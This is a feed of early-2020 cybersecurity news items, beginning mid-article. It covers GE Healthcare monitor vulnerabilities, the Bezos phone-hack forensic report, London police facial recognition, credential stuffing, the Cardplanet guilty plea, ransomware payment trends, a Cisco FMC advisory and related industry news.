The flawed devices are used mostly in health care facilities for displaying information regarding the physiologic parameters of a patient, such as heartbeat and blood pressure. They are also used to monitor the status of a patient from a central location in a facility, such as a nurse’s workstation.

The FDA said the vulnerabilities "may allow an attacker to remotely take control of the medical device and to silence alarms, generate false alarms and interfere with alarms of patient monitors connected to these devices."

ICS-CERT said that an attacker could use the flaws to obtain protected health information (PHI) data and to make the device unusable. 

In a statement published yesterday, GEHC said: "In the instructions provided with the devices, GEHC requires that the MC and IX networks are properly configured and isolated from other hospital networks. If those instructions are not followed, a vulnerable situation can exist where an attacker could gain access to the MC and IX networks via the hospital network."

GEHC has published instructions for risk mitigation along with instructions on where to find software updates or patches when they become available.

The FDA said yesterday that it was "not aware of any adverse events related to this vulnerability," while also saying that such incidents may be extremely hard to detect. 

"These vulnerabilities might allow an attack to happen undetected and without user interaction. Because an attack may be interpreted by the affected device as normal network communications, it may remain invisible to existing security measures," said the FDA.

In a statement published yesterday, GE Healthcare said: "There have been no reported incidences of a cyber-attack in a clinical use or any reported injuries associated with any of these vulnerabilities."

In July 2019, ICS-CERT issued a warning after vulnerabilities were detected in GE anesthesia and respiratory devices, GE Aestiva and GE Aespire (models 7100 and 7900).

Technical Report of the Bezos Phone Hack

Motherboard obtained and published the technical report on the hack of Jeff Bezos's phone, which is being attributed to Saudi Arabia, specifically to Crown Prince Mohammed bin Salman.

...investigators set up a secure lab to examine the phone and its artifacts and spent two days poring over the device but were unable to find any malware on it. Instead, they only found a suspicious video file sent to Bezos on May 1, 2018 that "appears to be an Arabic language promotional film about telecommunications."

That file shows an image of the Saudi Arabian flag and Swedish flags and arrived with an encrypted downloader. Because the downloader was encrypted this delayed or further prevented "study of the code delivered along with the video."

Investigators determined the video or downloader were suspicious only because Bezos' phone subsequently began transmitting large amounts of data. "[W]ithin hours of the encrypted downloader being received, a massive and unauthorized exfiltration of data from Bezos' phone began, continuing and escalating for months thereafter," the report states.

"The amount of data being transmitted out of Bezos' phone changed dramatically after receiving the WhatsApp video file and never returned to baseline. Following execution of the encrypted downloader sent from MBS' account, egress on the device immediately jumped by approximately 29,000 percent," it notes. "Forensic artifacts show that in the six (6) months prior to receiving the WhatsApp video, Bezos' phone had an average of 430KB of egress per day, fairly typical of an iPhone. Within hours of the WhatsApp video, egress jumped to 126MB. The phone maintained an unusually high average of 101MB of egress data per day for months thereafter, including many massive and highly atypical spikes of egress data."

The Motherboard article also quotes forensic experts on the report:

A mobile forensic expert told Motherboard that the investigation as depicted in the report is significantly incomplete and would only have provided the investigators with about 50 percent of what they needed, especially if this is a nation-state attack. She says the iTunes backup and other extractions they did would get them only messages, photo files, contacts and other files that the user is interested in saving from their applications, but not the core files.

"They would need to use a tool like Graykey or Cellebrite Premium or do a jailbreak to get a look at the full file system. That's where that state-sponsored malware is going to be found. Good state-sponsored malware should never show up in a backup," said Sarah Edwards, an author and teacher of mobile forensics for the SANS Institute.

"The full file system is getting into the device and getting every single file on there­ -- the whole operating system, the application data, the databases that will not be backed up. So really the in-depth analysis should be done on that full file system, for this level of investigation anyway. I would have insisted on that right from the start."

The investigators do note on the last page of their report that they need to jailbreak Bezos's phone to examine the root file system. Edwards said this would indeed get them everything they would need to search for persistent spyware like the kind created and sold by the NSO Group. But the report doesn't indicate if that did get done.

London Police Adopt Facial Recognition Technology as Europe Considers Five-Year Ban

London Police Adopt Facial Recognition Technology as Europe Considers Five-Year Ban

London's Metropolitan Police Service has announced that it will start using live facial recognition (LFR) technology to scan public areas for suspected criminals. 

After trialing the technology for two years, the Met has said that it will have cameras up and running within a month. The cameras will be linked to a database containing images of suspects. In the event that a suspect is identified by the camera, an alert will be generated.

According to senior technologist with the Met, Johanna Morley, the facial recognition technology has an accuracy rate of 70%. Morley said false identifications were made by the cameras one in a thousand times. 

Nick Ephgrave, an assistant commissioner, said: "As a modern police force, I believe that we have a duty to use new technologies to keep people safe in London. Independent research has shown that the public support us in this regard."

Civil liberties groups have described the planned introduction of the technology as "a breathtaking assault on our rights."

The Met said the cameras will only be deployed after consultation with local communities. Active cameras will be displayed overtly, leaving the public in no doubt that they are being watched as they go about their daily lives. 

Commenting on the Met's decision to introduce LFR, the director of Big Brother Watch, Silkie Carlo, said: "It flies in the face of the independent review showing the Met’s use of facial recognition was likely unlawful, risked harming public rights and was 81% inaccurate."

A spokesperson for the campaign group Liberty said: "This is a dangerous, oppressive and completely unjustified move by the Met. Facial recognition technology gives the state unprecedented power to track and monitor any one of us, destroying our privacy and our free expression."

In September 2019, Cardiff's high court ruled that police use of automatic facial recognition technology to search for people in crowds is lawful. The technology is currently being used by South Wales police.

The Met is the biggest force in the UK, with jurisdiction over London and Greater London, with the exception of the City of London, which has its own territorial police force.

News of the Met's decision comes a week after the European Commission revealed it is considering a ban on the use of facial recognition in public areas for up to five years while regulators try to work out a way to prevent the technology from being abused.

#BSidesLeeds: Credential Stuffing Often Seen as “Volume” Cybercrime

#BSidesLeeds: Credential Stuffing Often Seen as “Volume” Cybercrime

Speaking at BSides Leeds, security researcher Darren Martyn explored the issue of credential stuffing, calling it an “exploding problem on the internet” and the “cyber-equivalent of volume crime.”

Saying that credential stuffing is “aided by data leaks,” Martyn argued that nothing much has been done about it “as it is not cool like ransomware, but the problem exists, and it affects everyone.”

The problem is further enhanced by tools created to enable credential stuffing to be done much more easily, and tools which are sold purely “to engage in post-compromise monetization strategies.” He said that as little as $10 can get you dumps of passwords which has been done by “low level hacking” and most of the tools are “idiot proof.”

He added that “kids revolutionized testing while we were writing Python scripts, and the kids write things that actually work.” As well as low level hacking efforts, you can build tools to do searches for data sets for you, and in his research he had stumbled across hundreds of accounts

In terms of how this makes money, he said that he had “cosplayed as a cyber-criminal” to find more information, and said that there is a “fantastic secondary market for logins” as people can add cash to gift cards using stored credit cards, or in video games where you can pay for in-game items.

Martyn said that despite the scale of the problem, “no-one cares as it affects the consumer who cannot pay for pen testing” and they are left out of pocket, “while the criminals laugh all the way to the bank.”

In terms of protection, he recommended consumers use a password manager and two-factor authentication to better protect their details and logins, while businesses should look to make automated login testing hard, but there were problems with rate limiting, temporary IP blocks and captchas as they can be bypassed.

Asked by Infosecurity what a good first step would be to better prevent credential stuffing attacks, Martyn said that, if you are a company, start by trying to make it expensive for the attacker.

“Rate limiting, temporary IP blocks and captchas don’t prevent, they just slow down,” he said, “but actually put in logging as you will know straight away when you are getting lit up by some script kiddie with Sentry, and your application logs start showing 'gajillions' of logins. See if your API is being brute forced, as no one really checks.”

Russian National Pleads Guilty to Having Run Cardplanet Marketplace

A Russian national pleaded guilty to having operated Cardplanet and another website that provided digital criminal services to its customers. Appearing before Senior U.S. District Judge T.S. Ellis III, Aleksei Burkov, 29, pleaded guilty to charges of access device fraud, conspiracy to commit computer intrusion, identity theft, wire and access device fraud as well as […]… Read More

The post Russian National Pleads Guilty to Having Run Cardplanet Marketplace appeared first on The State of Security.

This Week in Security News: Trend Micro Creates Factory Honeypot to Trap Malicious Attackers and Microsoft Leaves 250M Customer Service Records Open to the Web

Welcome to our weekly roundup, where we share what you need to know about the cybersecurity news and events that happened over the past few days. This week, dive into a research study that explores the risks associated with common cybersecurity vulnerabilities in a factory setting. Also, read about how misconfigured Microsoft cloud databases containing 14 years of customer support logs exposed 250 million records.

Read on:

Don’t Let the Vulnera-Bullies Win. Use Our Free Tool to See If You Are Patched Against Vulnerability CVE-2020-0601

Last week, Microsoft announced vulnerability CVE-2020-0601 and has already released a patch to protect against any exploits stemming from the vulnerability. Understanding how difficult it can be to patch systems in a timely manner, Trend Micro created a valuable tool that will test endpoints to determine if they have been patched against this latest threat or if they are still vulnerable.

Ransomware, Snooping and Attempted Shutdowns: See What Hackers Did to These Systems Left Unprotected Online

Malicious hackers are targeting factories and industrial environments with a wide variety of malware and cyberattacks including ransomware and cryptocurrency miners. All of these incidents were spotted by researchers at Trend Micro who built a honeypot that mimicked the environment of a real factory. The fake factory featured some common cybersecurity vulnerabilities to make it appealing for hackers to discover and target.

Defend Yourself Now and In the Future Against Mobile Malware

Recently, 42 apps were removed from the Google Play Store after being installed eight million times over the period of a year, flooding victims’ screens with unwanted advertising. Trend Micro blocked more than 86 million mobile threats in 2018, and that number is expected to continue to increase. To learn how to protect your mobile device from hackers, read this blog from Trend Micro.

Trend Micro Joins LOT Network to Fight ‘Patent Trolls’

Trend Micro announced this week that it has joined non-profit community LOT Network in a bid to combat the growing threat posed to its business and its customers by patent assertion entities (PAEs). The community now has more than 500 members, including some of the world’s biggest tech companies such as Amazon, Facebook, Google, Microsoft and Cisco.

Blocking A CurveBall: PoCs Out for Critical Microsoft-NSA Bug CVE-2020-0601

Security researchers have released proof-of-concept (PoC) codes for exploiting CVE-2020-0601, a bug that the National Security Agency (NSA) reported. The vulnerability affects Windows operating systems’ CryptoAPI’s validation of Elliptic Curve Cryptography (ECC) certificates and Public Key Infrastructure (PKI) trust. Enterprises and users are advised to patch their systems immediately to prevent attacks that exploit this security flaw.

Microsoft Leaves 250M Customer Service Records Open to the Web

Misconfigured Microsoft cloud databases containing 14 years of customer support logs exposed 250 million records to the open internet for 25 days. The account information dates back as far as 2005 and as recent as December 2019 and exposes Microsoft customers to phishing and tech scams. Microsoft said it is in the process of notifying affected customers.

Microsoft Releases Advisory on Zero-Day Vulnerability CVE-2020-0674, Workaround Provided

On January 17, Microsoft published an advisory (ADV200001) warning users about CVE-2020-0674, a remote code execution (RCE) vulnerability involving Microsoft’s Internet Explorer (IE) web browser. A patch has not yet been released as of the time of writing — however, Microsoft has acknowledged that it is aware of limited targeted attacks exploiting the flaw.

Google to Apple: Safari’s Privacy Feature Actually Opens iPhone Users to Tracking

Researchers from Google’s Information Security Engineering team have detailed several security issues in the design of Apple’s Safari anti-tracking system, Intelligent Tracking Prevention (ITP). ITP is designed to restrict cookies and is Apple’s answer to online marketers that track users across websites. However, Google researchers argue in a new paper that ITP leaks Safari users’ web browsing habits.

Hacker Publishes Credentials for Over 515,000 Servers, Routers, and IoT Devices

A hacker has published the credentials of over 515,000 servers, routers, and IoT devices on a well-known hacking website. ZDNet reported that the list consists of IP addresses and the usernames and passwords used by each for unlocking Telnet services, the port that allows these devices to be controlled through the internet.

Pwn2Own Miami Contestants Haul in $180K for Hacking ICS Equipment

The first Pwn2Own hacking competition that exclusively focuses on industrial control systems (ICS) has kicked off in Miami. So far, a total of $180,000 has been awarded for pwning five different products. The contest hosts at Trend Micro’s Zero Day initiative (ZDI) have allocated more than $250,000 in cash and prizes for the contest, which is testing eight targets across five categories.

Sextortion Scheme Claims Use of Home Cameras, Demands Bitcoin or Gift Card Payment

A new sextortion scheme has been found preying on victims’ fears through social engineering and follows in the footsteps of recent sextortion schemes demanding payment in bitcoin. Security researchers at Mimecast observed the scheme during the first week of the year. The scheme reportedly sent a total of 1,687 emails on Jan. 2 and 3, mostly to U.S. email account holders.

NetWire RAT Hidden in IMG Files Deployed in BEC Campaign

A recent business email compromise (BEC) campaign, purportedly coming from a small number of scammers in Germany, targets organizations by sending them emails with IMG file attachments hiding a NetWire remote access trojan (RAT). The campaign was discovered by IBM X-Force security researchers and involves sending an employee of the targeted organization an email masquerading as a corporate request.

What are your thoughts on the results of Trend Micro’s factory honeypot study? Share your thoughts in the comments below or follow me on Twitter to continue the conversation: @JonLClay.

The post This Week in Security News: Trend Micro Creates Factory Honeypot to Trap Malicious Attackers and Microsoft Leaves 250M Customer Service Records Open to the Web appeared first on .

MDhex vulnerabilities open GE Healthcare patient monitoring devices to attackers

Researchers have discovered six critical and high-risk vulnerabilities – collectively dubbed MDhex – affecting a number of patient monitoring devices manufactured by GE Healthcare. The flaws may, according to GE Healthcare, allow an attacker to make changes at the device’s OS level that may render the device unusable or interfere with its function, make changes to alarm settings on connected patient monitors, and utilize services used for remote viewing and control of multiple devices on … More

The post MDhex vulnerabilities open GE Healthcare patient monitoring devices to attackers appeared first on Help Net Security.

Russian operator of Cardplanet carding site pleads guilty in the US

A Russian national pleaded guilty this week to running a carding website called Cardplanet that helped people commit credit-card fraud.

Last year, the Russian man Aleksei Burkov (29) was accused of running an online criminal marketplace, called Cardplanet, that helped crooks to organize more than $20 million in credit card fraud. In November, the suspect has been extradited to the US to face criminal charges.

Burkov was also operating another invite-only cybercrime forum, to obtain membership prospective members needed three existing members to “vouch” for their good reputation in the cybercrime community. The membership also requested a sum of money, normally $5,000, as insurance. Cardplanet was offering for sale stolen credit-card numbers for a price ranging from $3 to $60.

The suspect was arrested in Israel in 2015, his case made the headlines multiple times because media speculated a possible prisoner swap with Naama Issachar, an Israeli-American that was arrested in Russia on cannabis charges. In October, the Israel justice minister approved the extradition of Alexei Burkov to the United States.

Burkov entered the plea to charges including fraud and money laundering in a federal court in Alexandria.

“A Russian national pleaded guilty today to charges related to his operation of two websites devoted to the facilitation of payment card fraud, computer hacking and other crimes.” reads the press release published by the Department of Justice. “Aleksei Burkov, 29, pleaded guilty before Senior U.S. District Judge T.S. Ellis III to access device fraud and conspiracy to commit computer intrusion, identity theft, wire and access device fraud and money laundering.  Sentencing is scheduled for May 8, 2020.”

In court, Burkov admitted to running a second website on an invite-only basis that was also for sale stolen payment data.

Sentencing is scheduled for May 8, 2020, Burkov faces a prison sentence of up to 15 years.

Pierluigi Paganini

(SecurityAffairs – Burkov, hacking)

The post Russian operator of Cardplanet carding site pleads guilty in the US appeared first on Security Affairs.

#BSidesLeeds: Cyber is Running the World, More Innovation to Come

#BSidesLeeds: Cyber is Running the World, More Innovation to Come

In the opening keynote at BSides Leeds head of cybersecurity research Daniel Cuthbert said that we are “in the best industry in the world” and, having spent 27 years doing cybersecurity, he has seen that it is the “misfits and weirdos who are doing amazing things.”

Cuthbert said that we are “going through interesting times” in what we are calling the 'fourth industrial revolution,' “and it is good as it is about cyber” and there has been a fundamental change in how we relate and talk.

Pointing to the 1984 film Revenge of the Nerds, he explained that if you look at the most powerful people in the world, they are people like Elon Musk and Mark Zuckerberg, and “people in technology impact how we work.”

Cuthbert also pointed out that law makers and politicians are getting more involved in cybersecurity issues, as once 'Spot the Fed' was played at DEFCON, distinguishable by their smart-casual clothing, eventually “they saw the need to get people like us back in the fold.”

This was made further evident by the likes of San Bernadino district attorney Michael Ramos using the term “lying dormant cyber-pathogen” after the shooting and locked iPhone debate, and Cuthbert also pointed at the FBI now having a dedicated page for cyber-criminals, which was mostly made of foreign nationals.

“Don’t stop what you’re doing; we do amazing stuff and people watch what we do,” he said.

European Energy Firm Targeted by RAT Linked to Iran

European Energy Firm Targeted by RAT Linked to Iran

Security researchers have discovered a new cyber-espionage operation with links to Iranian state hacking groups targeting a major European energy organization.

Recorded Future’s Insikt Group detected command-and-control (C&C) communications between a C&C server and the victim organization, from late November 2019 until at least January 5 2020.

The C&C server is associated with PupyRAT, an open source, post-exploitation remote access Trojan (RAT) used in the past by multiple Iranian threat actor groups such as APT33 and Cobalt Gypsy.

“While metadata alone does not confirm a compromise, we assess that the high volume and repeated communications from the targeted mail server to a PupyRAT C2 are sufficient to indicate a likely intrusion,” the security vendor wrote.

“Whoever the attacker is, the targeting of a mail server at a high-value critical infrastructure organization could give an adversary access to sensitive information on energy allocation and resourcing in Europe.”

Recorded Future emphasized that the activity pre-dates the current escalation in tensions between the West and Tehran, following the US assassination of a leading Iranian general and the downing of a civilian aircraft by Iranian soldiers.

Security experts have warned that the stand-off could lead to a new wave of Iranian attempts to compromise and disrupt critical infrastructure in the US and elsewhere.

In fact, as Recorded Future argued, Iranian state hackers have been “amassing operational network infrastructure throughout 2019,” and shifted their focus from IT networks to physical control systems in utilities, manufacturing facilities and oil refineries.

The firm urged organizations take a defence-in-depth approach to guard against RATs like PupyRat.

This includes: implementing multi-factor authentication, and/or using a password manager to store unique, strong credentials, monitoring for sequential login attempts from the same IP against different accounts and analyzing and cross-referencing log data.

Ako Ransomware targeting businesses using RaaS

Ako Ransomware targeting businesses using RaaS Quick Heal security researchers recently observed ransomware that uses RaaS (Ransomware as a Service) which is a subpart of MaaS (Malware as a Service). Before delving into the AKO ransomware or RaaS, one must understand what Malware as a Service means, as it is…

Ransomware Payments Doubled and Downtime Grew in Q4

Ransomware Payments Doubled and Downtime Grew in Q4

The average ransomware payment more than doubled quarter-on-quarter in the final three months of 2019, while average downtime grew by several days, according to the latest figures from Coveware.

The security vendor analyzed anonymized data from cases handled by its incident response team and partners to compile its Q4 Ransomware Marketplace report.

It revealed that the average payment in the quarter was $84,116, up 104% from the previous three months. Coveware claimed the jump highlights the diversity of hackers utilizing ransomware today.

“Some variants such as Ryuk and Sodinokibi have moved into the large enterprise space and are focusing their attacks on large companies where they can attempt to extort the organization for a seven-figure payout. For instance, Ryuk ransom payments reached a new high of $780,000 for impacted enterprises,” it argued.

“On the other end of the spectrum, smaller ransomware-as-a-service variants such as Dharma, Snatch, and Netwalker continue to blanket the small business space with a high number of attacks, but with demands as low as $1500.”

That said, Sodinokibi (29%) and Ryuk (22%) accounted for the majority of cases spotted in Q4 2019. Attackers using the former variant began during the quarter to use data theft to force firms to pay-up, which may have increased the figure for total losses.

Also during the quarter, the amount of downtime experienced by victim organizations increased from the previous three months — from 12.1 to 16.2 days. This increase was driven by the larger number of attacks targeting major enterprises with more complex network architectures, which can therefore take weeks to restore and remediate, Coveware claimed.

Phishing, RDP targeting and vulnerability exploitation remain the most popular attack methods, it added. Professional services (20%), healthcare (19%) and software services (12%) were the top three sectors targeted.

According to the data, 98% of organizations that paid a ransom received a decryption key, and those victims successfully decrypted 97% of their data. However, with multi-million-dollar ransoms now commonplace, the official advice is still not to give in to the hackers’ demands, especially as it will lead to continued attacks.

Cisco fixes critical issue in Cisco Firepower Management Center

Cisco addressed a critical issue in the Cisco Firepower Management Center (FMC) that could allow a remote attacker to bypass authentication and execute arbitrary actions.

Cisco fixed a critical vulnerability in the Cisco Firepower Management Center that could allow a remote attacker to gain administrative access to the web-based management interface of the vulnerable devices and execute arbitrary actions. The vulnerability tracked as CVE-2019-16028 received a CVSS score of 9.8. 

“A vulnerability in the web-based management interface of Cisco Firepower Management Center (FMC) could allow an unauthenticated, remote attacker to bypass authentication and execute arbitrary actions with administrative privileges on an affected device.” reads the security advisory published by Cisco.

“The vulnerability is due to improper handling of Lightweight Directory Access Protocol (LDAP) authentication responses from an external authentication server. An attacker could exploit this vulnerability by sending crafted HTTP requests to an affected device. A successful exploit could allow the attacker to gain administrative access to the web-based management interface of the affected device.”

The issue, Cisco stems from the improper handling of Lightweight Directory Access Protocol (LDAP) authentication responses from an external server. The issue could be triggered by sending crafted HTTP requests to a vulnerable device and gain administrative access to the web-based management interface.

Cisco warns that only Cisco Firepower Management Center configured to authenticate users of the web-based management interface through an external LDAP server are affected. 

“To determine whether external authentication using an LDAP server is configured on the device, administrators can navigate to System > Users > External Authentication and look for an External Authentication Object that uses LDAP as the authentication method. The External Authentication Object must be enabled for the FMC to be affected.” continues the advisory.

Cisco released FMC Software versions 6.4.0.7 and 6.5.0.2 to address the flaw, it also announced the release of patches for versions 6.2.3 (6.2.3.16) and 6.3.0 (6.3.0.6) in February and May 2020, respectively. 

The company confirmed that there are no workarounds that address this vulnerability, it also confirmed that this issue does not affect Cisco Adaptive Security Appliance (ASA) Software or Cisco Firepower Threat Defense (FTD) Software.

Cisco is not aware of any attack in the wild exploiting the flaw.

Pierluigi Paganini

(SecurityAffairs – Iran, hacking)

The post Cisco fixes critical issue in Cisco Firepower Management Center appeared first on Security Affairs.

Privacy watchdog throws wider net to protect children online

A new, comprehensive code will compel online services to put children's health and safety before data-collecting profits.

Lessons from Microsoft’s 250 million data record exposure

Microsoft has one of the best security teams and capabilities of any organization in the technology industry, yet it accidentally exposed 250 million customer records in December 2019. The data was accessible to anyone with a browser, who knew the server location, for about a month in total before an external researcher detected the problem. The database held records of customer support engagements dating back to 2005. Once alerted, Microsoft quickly closed the hole, investigated … More

The post Lessons from Microsoft’s 250 million data record exposure appeared first on Help Net Security.

Hashtag Trending – Amazon is most valuable brand ever; tech giants spending heavy on lobbying; Tesla hits milestone

Amazon officially becomes the most valuable brand of all time; tech giants set new record for money spent on lobbying; Tesla hits major milestone When many of us think about Amazon, we likely think of a tech giant that has grown to be the world’s biggest company. But now, it is official that the company…

Russian Pleads Guilty to Running ‘CardPlanet’ to Sell Stolen Credit Cards

Image credit: Times of Israel. Aleksei Burkov, a 29-year-old Russian hacker, on Thursday pleaded guilty to multiple criminal charges for running two illegal websites that helped cyber criminals commit more than $20 million in credit card fraud. The first website Burkov operated was an online marketplace for buying and selling stolen credit card and debit card numbers—called Cardplanet—which

Sonos Backtracks to Offer Fixes for Legacy Speakers

Sonos Backtracks to Offer Fixes for Legacy Speakers

Sonos appears to have bowed to customer pressure and will now offer security updates for legacy kit and ensure it can co-exist with newer systems.

The smart speaker firm issued a statement earlier this week warning that from May, “some of our oldest products will no longer receive software updates or new features.”

It claimed that the legacy products — Zone Players, Connect and Connect:Amp, first-generation Play:5, CR200 , and Bridge — were “stretched to their technical limits.” The firm urged customers to buy new items and take their old kit to a recycling facility.

That stance drew criticism from customers concerned that they wouldn’t be able to use old speakers in concert with newer, supported equipment.

A furore also erupted over the firm’s roll-out of a “Recycle Mode” for legacy equipment, which was designed to protect consumers from unwittingly buying old speakers. It effectively removes all user information and permanently bricks the device in preparation for recycling. But it has been argued that by doing so, recycling firms can subsequently do nothing but strip it for parts, which is more wasteful.

To its credit, Sonos appears to have reversed its stance. In an apology published on Thursday, CEO Patrick Spence said the firm would continue to offer security updates to legacy purchases, as well as finding a way for old and new equipment to work together.

“We are not bricking them, we are not forcing them into obsolescence, and we are not taking anything away. Many of you have invested heavily in your Sonos systems, and we intend to honor that investment for as long as possible,” he said.

“While legacy Sonos products won’t get new software features, we pledge to keep them updated with bug fixes and security patches for as long as possible. If we run into something core to the experience that can’t be addressed, we’ll work to offer an alternative solution and let you know about any changes you’ll see in your experience.”

Back in 2018, Trend Micro research warned that hackers could exploit flaws on internet-connected Sonos speakers to remotely control the devices themselves and infiltrate the networks they’re on.

This could present security challenges for corporates if remote workers have speakers operating on their home networks, it claimed.

Seqrite’s top ten most-read blogs in 2019

Estimated reading time: 3 minutes

2019 was an action-packed year for cybersecurity. Nation-states continued their progress towards drafting data protection laws with the world still coming to terms with changing technologies in cybersecurity. Seqrite blogs analyzed the latest trends in the cybersecurity industry — here were the top ten most-read blogs of 2019.

1.     Artificial Intelligence – its Use & Misuse

While the term ‘artificial intelligence’ continues to become more popular and conjure up images of the futuristic technology, it is important to understand what exactly it is. This article provides an explanation of artificial intelligence along with its functionalities in the cybersecurity space. It also articulates the various ways in which AI could be misused.

2.     Can EVMs get hacked? We tell you the truth

The year 2019 saw momentous elections in countries as varied as India, the United Kingdom, Indonesia and Israel. The modern era of technology has given rise to various fears on the question of if Electronic Voting Machines (EVMs) can be hacked? This article analyzes such concerns and provides an answer.

3.     This is how hackers can invade your system without installing malware

Attackers are exploiting systems through a dangerous new technique called file-less malware. This type of malware enters systems without alerting cybersecurity solutions, rendering them very dangerous. This article explains how attacks are deployed using this malware and how to prevent them.

4.     Employees working on their personal device? Here’s how to secure them

The Bring Your Own Device revolution has heralded a huge rise in the number of personal devices in the enterprise network. While employees love using their own personal devices for work, these actions have their own security risks and this article explains how to secure personal devices.

5.      The banking sector’s top cybersecurity challenges

In the last few years, the banking sector has seen some major cyber attacks that have resulted in damaging financial repercussions. This is a sector which is at great risk to cybersecurity challenges and this article explains how to deal with some of the top challenges.

6.     5 Cybersecurity Best Practices For Your Small to Medium-Size Business

Small to Medium-Size Businesses (SMEs) often underestimate cybersecurity risks under a mistaken assumption that they will not be targeted by attackers. Ironically, they could actually be at a higher risk. This article outlines the top 5 cybersecurity best practices for SMEs.

7.     The healthcare industry’s largest cyber challenges

The healthcare sector sees a tremendous penetration of cyber attacks every year. The cost of cyber attacks on healthcare can also potentially be devastating as it can have life-and-death consequences. This article explains why the healthcare industry represents such a big cyber risk and what the challenges it faces are.

8.     What happens when you don’t patch your software?

In 2017, the WannaCry ransomware caused chaos across more than 300,000 systems across different countries. The scale of the attack was momentous and the root cause of it was unpatched systems. This article highlights the danger of letting systems remain unpatched and the troubling consequences that can emerge.

9.     How to reduce the cost of data leakage when an employee is Out Of Office

Vacation periods often see a spike in cyber attacks as employees get carried away and become negligent about cybersecurity. It’s important for enterprises to understand this and invest in solutions like Data Loss Prevention (DLP). This article provides some solutions on how to ensure enterprise cybersecurity remains robust while employees are Out of Office.

10.    Cybersecurity roundup – January to April 2019

The first four months of the year saw a flurry of cyberattacks from across the globe. Whether it was Facebook accidentally uploading email contacts of 1.5 million users or personal data of German politicians being leaked, this article provides an overview of the top cybersecurity news between January and April 2019.

Did we miss out on anything? Tell us!

The post Seqrite’s top ten most-read blogs in 2019 appeared first on Seqrite Blog.